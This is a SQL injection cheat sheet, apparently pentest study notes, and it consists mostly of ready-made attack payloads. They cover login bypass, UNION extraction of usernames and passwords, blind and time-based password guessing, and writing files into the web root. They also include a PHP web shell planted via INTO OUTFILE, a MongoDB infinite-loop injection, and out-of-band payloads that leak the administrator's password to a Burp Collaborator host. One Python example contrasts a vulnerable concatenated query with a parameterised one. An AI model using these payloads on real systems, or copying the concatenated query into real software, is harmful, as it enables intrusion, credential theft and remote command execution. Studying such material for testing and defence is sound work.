SQL Injection Techniques
Introduction
- One of the most devastating server-side bugs.
- Nowadays, you won't find it using a simple 'OR 1=1-- payload, but there are some tricks to still find it.
- Before understanding SQLi, you should know the basics of SQL. Here's a quick SQL refresher: SQL Basics.

Testing with Injection Strings
- Test by injecting strings like: ', -, /, ', :, ;

Extracting User ID
- SQL Query:
SELECT Id FROM Users WHERE Username='you' AND Password='password123';
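The login query above, built two ways in an added Python example that is not from the original page: the string-concatenated form, which the Introduction's 'OR 1=1-- payload bypasses, beside the parameterised form that treats the same input as plain data. The in-memory SQLite database, its rows and the function names are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite stand-in for the page's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Id INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users (Id, Username, Password) VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "you", "password123")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the 'Extracting User ID' query by string formatting.
    Whatever the user types becomes part of the SQL statement text."""
    sql = f"SELECT Id FROM Users WHERE Username='{username}' AND Password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the values separately
    from the statement, so quotes and comment markers stay inside the value."""
    sql = "SELECT Id FROM Users WHERE Username=? AND Password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Runs both forms against the classic payload quoted in the Introduction."""
    conn = make_db()
    payload = "' OR 1=1--"
    return {
        # concatenation: WHERE ... AND Password='' OR 1=1--'  -> matches every row
        "vulnerable": login_vulnerable(conn, "you", payload),
        # parameters: the literal string "' OR 1=1--" matches no password
        "safe": login_safe(conn, "you", payload),
        # the real credentials still work through the safe path
        "legit": login_safe(conn, "you", "password123"),
    }


if __name__ == "__main__":
    print(demo())
```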

Altering Database Records
- SQL Query:
UPDATE Users SET Password='password12345' WHERE Id = 2;

Second Order SQLi
- SQL Query:
username="john_Cena' UNION SELECT Username, Password FROM Users;-- "&password=password123

Classic SQLi (Rare Nowadays)
- SQL Query:
SELECT Title, Body FROM Emails WHERE Username='kane' AND AccessKey='ZB6w0YLjzvAVmp6zvr' UNION SELECT Username, Password FROM Users;--

Blind SQLi
- You might use a webserver to get your responses too.
- SQL Query:
SELECT * FROM PremiumUsers WHERE Id='2' UNION SELECT Id FROM Users WHERE Username = 'admin' AND SUBSTR(Password, 1, 1) = 'a';--

Time-Based SQLi
- Time-based payloads rely on a delay function such as sleep(5): the response time, not the page content, reveals whether the condition held.
- SQL Query:
2' UNION SELECT IF(SUBSTR(Password, 1, 1) = 'a', SLEEP(10), 0) Password FROM Users WHERE Username = 'admin';

Exfiltrating Data using SQLi
- SQL Query:
SELECT Password FROM Users WHERE Username='admin' INTO OUTFILE '/var/www/html/output.txt'
- Now open the written file through its URL and view it.

NoSQL Injection (MongoDB)
- Some example queries for NoSQL injection:
Users.find({username: 'vickie', password: 'password123'});
Users.find({username: $username, password: $password});
Users.find( { $where: function() { return (this.username == 'ohyea'; while(true){};) } } );
Users.find( { $where: function() { return (this.username == $user_input) } } );

Automate with NoSQLMap

Learning About the Database
- SQL Query:
SELECT Title, Body FROM Emails WHERE Username='vickie' UNION SELECT 1, @@version;--

Common Commands for Querying the Version
- Some common version queries:
@@version for Microsoft SQL Server and MySQL
version() for PostgreSQL
v$version for Oracle

Time-Based Database Version
- SQL Query:
SELECT * FROM PremiumUsers WHERE Id='2' UNION SELECT IF(SUBSTR(@@version, 1, 1) = '1', SLEEP(10), 0); --

Gaining a Web Shell
- SQL Query:
SELECT Password FROM Users WHERE Username='abc' UNION SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

XML Injection
- SQL Query:
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Hex Entities
- SQL Query:
<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>